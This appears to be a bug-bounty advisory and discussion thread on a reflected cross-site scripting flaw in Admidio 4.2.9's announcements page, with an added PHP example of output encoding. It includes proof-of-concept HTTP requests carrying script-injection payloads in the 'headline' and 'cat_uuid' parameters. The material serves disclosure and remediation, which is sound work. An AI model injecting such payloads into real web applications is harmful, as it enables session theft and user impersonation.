Cross site scripting in Admidio 4.2.9 via headline parameter in admidio/admidio

Valid

Reported on

Jun 18th 2023


Description

Cross-site Scripting (XSS) refers to a client-side code injection attack in which an attacker can execute malicious scripts in a legitimate website or web application. XSS occurs when a web application uses unvalidated or unencoded user input in the output it generates.

Proof of Concept

URL: http://localhost/admidio-4.2.9/adm_program/modules/announcements/announcements.php
Vulnerable Parameter: headline

Details:
URL encoded GET input headline was set to Announcements"><script>alert(9370)</script>

The input is reflected inside a tag parameter between double quotes.

HTTP Request:

GET /admidio-4.2.9/adm_program/modules/announcements/announcements.php?cat_uuid=0&headline=Announcements"><script>alert(9370)</script> HTTP/1.1
Referer: http://localhost/admidio-4.2.9/
Cookie: ADMIDIO_admidio_adm_SESSION_ID=1vv2p802t9j8fiek592n3p6uqj; ADMIDIO_admidio_adm_cookieconsent_status=dismiss
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Host: localhost
Connection: Keep-alive

HTTP Response:

Redacted [*]

<p class="lead">The URL in the field <strong>http://localhost/admidio-4.2.9/adm_program/modules/announcements/announcements.php?cat_uuid=0&headline=Announcements"><script>alert(9370)</script></strong> contains invalid characters.<br /><br />Only alphabetic characters, umlauts, numbers 0-9 and special characters .-+_:/#?= are allowed.</p>

Screenshot

How to fix this vulnerability:

Apply context-dependent encoding and/or validation to user input rendered on a page
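As an added illustration of the fix described above (example code written for this page, not Admidio's own), the following PHP renders a user-supplied headline inside a double-quoted attribute, which is the context the report identifies, first unencoded and then with attribute-context encoding. It also includes an allow-list check modelled on the error message quoted in the HTTP response. The function names, the markup, and the allow-list (which adds a space to the characters that message lists) are assumptions, and the input string is the payload from the report.

```php
<?php
// Added example, not Admidio code: encoding and validating a "headline"
// value before it is rendered inside a double-quoted HTML attribute.

declare(strict_types=1);

// Encoding for HTML text and for attribute values delimited by double quotes.
// ENT_QUOTES also escapes single quotes; ENT_SUBSTITUTE replaces invalid
// UTF-8 instead of returning an empty string for the whole value.
function encodeHtml(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Allow-list validation modelled on the message in the report's HTTP
// response: letters (including umlauts), digits and .-+_:/#?= .
// The space is an assumption added here so that multi-word headlines pass.
function isAllowedHeadline(string $value): bool
{
    return preg_match('~^[\p{L}0-9 .\-+_:/#?=]+$~u', $value) === 1;
}

// Vulnerable pattern: raw input placed inside a double-quoted attribute.
// A double quote in the input closes the attribute and the tag.
function renderHeadlineUnsafe(string $headline): string
{
    return '<input type="text" name="headline" value="' . $headline . '">';
}

// Hardened pattern: the same markup with attribute-context encoding, so the
// double quote becomes &quot; and the angle brackets become &lt; / &gt;.
function renderHeadlineSafe(string $headline): string
{
    return '<input type="text" name="headline" value="' . encodeHtml($headline) . '">';
}

// Hardened pattern with validation first: reject instead of sanitising,
// then still encode the value for the attribute context.
function renderHeadlineValidated(string $headline): string
{
    if (!isAllowedHeadline($headline)) {
        // In the application this would be an error page; here a safe fallback.
        $headline = 'Announcements';
    }
    return renderHeadlineSafe($headline);
}

// Constructed input: the payload string from the report.
$payload = 'Announcements"><script>alert(9370)</script>';

echo "Unsafe:     ", renderHeadlineUnsafe($payload), PHP_EOL;
echo "Encoded:    ", renderHeadlineSafe($payload), PHP_EOL;
echo "Validated:  ", renderHeadlineValidated($payload), PHP_EOL;
echo "Allow-list accepts payload? ", var_export(isAllowedHeadline($payload), true), PHP_EOL;
echo "Allow-list accepts plain?   ", var_export(isAllowedHeadline('Announcements 2023'), true), PHP_EOL;
```

Encoding is the primary control and must match the output context: the maintainer's reproduction below shows a headline of `Announcements">alert(9370)`, meaning the script tags were not rendered but the closing double quote survived, and inside a quoted attribute that quote is exactly the character that has to become `&quot;`. The allow-list check is a secondary layer; it should reject disallowed input rather than attempt to clean it, and it does not replace encoding because a later change to the allowed characters would otherwise silently reopen the issue.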

Impact

Malicious JavaScript has access to all the same objects as the rest of the web page, including access to cookies and local storage, which are often used to store session tokens. If an attacker can obtain a user's session cookie, they can then impersonate that user.

We are processing your report and will contact the admidio team within 24 hours. 6 months ago
We have contacted a member of the admidio team and are waiting to hear back 6 months ago
Markus
5 months ago

Maintainer


Hi, I'm not able to reproduce that behavior. If I enter the URL adm_program/modules/announcements/announcements.php?cat_uuid=0&headline=Announcements"><script>alert(9370)</script> then I get a headline, e.g. Announcements">alert(9370), but nothing else. No alert is shown, nor the response that you mentioned.

Scream0h0lics
5 months ago

Researcher


Hi Mark,

Good day!

Upon checking, it seems that this is only a self-XSS which only works when the response is from Burp Suite. Please see the screenshots below:

Screenshot 1: [image]

Screenshot 2: [image]

Screenshot 3: [image]

HTTP Request Used:

GET /admidio-4.2.9/adm_program/modules/announcements/announcements.php?cat_uuid=0">xxxx<script>alert(1)</script>xxxx&headline=Announcements">xxxx<script>alert(9370)</script> HTTP/1.1
Host: localhost
sec-ch-ua: 
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.110 Safari/537.36
sec-ch-ua-platform: ""
Accept: */*
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: script
Referer: http://localhost/admidio-4.2.9/adm_program/overview.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: ADMIDIO_admidio_adm_SESSION_ID=3b0nln1d94pi59vd8rhr30v9sq
Connection: close
Markus Faßbender modified the Severity from High (7.3) to Medium (5.6) 5 months ago
The researcher has received a minor penalty to their credibility for miscalculating the severity: -1
Markus Faßbender validated this vulnerability 5 months ago

I set the complexity to high because for me it's not that easy to get to this XSS only via link.

Scream0h0lics has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Markus Faßbender marked this as fixed in 4.2.10 with commit 4aac1e 5 months ago
Markus Faßbender has been awarded the fix bounty
This vulnerability will not receive a CVE
This vulnerability is scheduled to go public on Jul 16th 2023
Markus Faßbender published this vulnerability 5 months ago